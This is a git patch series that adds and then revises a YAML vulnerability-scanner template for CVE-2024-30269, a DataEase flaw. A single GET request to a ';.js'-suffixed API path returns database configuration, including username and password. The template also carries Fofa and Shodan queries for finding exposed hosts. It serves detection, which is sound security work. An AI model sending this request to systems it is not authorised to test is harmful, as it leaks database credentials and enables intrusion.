From a95e83b154066b453e9979ea06759046ad1448cf Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 26 Sep 2024 17:28:05 +0300 Subject: [PATCH 1/2] add CVE-2024-30269 --- http/cves/2024/CVE-2024-30269.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-30269.yaml diff --git a/http/cves/2024/CVE-2024-30269.yaml b/http/cves/2024/CVE-2024-30269.yaml new file mode 100644 index 00000000000..4632ba1190d --- /dev/null +++ b/http/cves/2024/CVE-2024-30269.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-30269 + +info: + name: DataEase <= 2.4.1 - Sensitive Information Exposure + author: s4e-io + severity: medium + description: | + DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned. + remediation: The vulnerability has been fixed in v2.5.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-30269 + - https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5 + - https://github.com/dataease/dataease + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-30269 + cwe-id: CWE-200 + epss-score: 0.00043 + epss-percentile: 0.09595 + metadata: + verified: true + max-request: 1 + vendor: dataease + product: dataease + fofa-query: body="dataease" + shodan-query: http.html:"dataease" + tags: cve,cve2024,dataease,info-leak + +http: + - raw: + - | + GET /de2api/engine/getEngine;.js HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"username", "password", "port")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and From 84f8575ac3640ea7de652f04058280e2e0a5ab4b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 30 Sep 2024 12:55:07 +0400 Subject: [PATCH 2/2] Update CVE-2024-30269.yaml --- http/cves/2024/CVE-2024-30269.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-30269.yaml b/http/cves/2024/CVE-2024-30269.yaml index 4632ba1190d..09cee0d33ac 100644 --- a/http/cves/2024/CVE-2024-30269.yaml +++ b/http/cves/2024/CVE-2024-30269.yaml @@ -25,18 +25,17 @@ info: product: dataease fofa-query: body="dataease" shodan-query: http.html:"dataease" - tags: cve,cve2024,dataease,info-leak + tags: cve,cve2024,dataease,exposure http: - - raw: - - | - GET /de2api/engine/getEngine;.js HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/de2api/engine/getEngine;.js" matchers: - type: dsl dsl: - - 'contains_all(body,"username", "password", "port")' + - 'contains_all(body, "username", "password", "port", "name\":", "pid\":")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and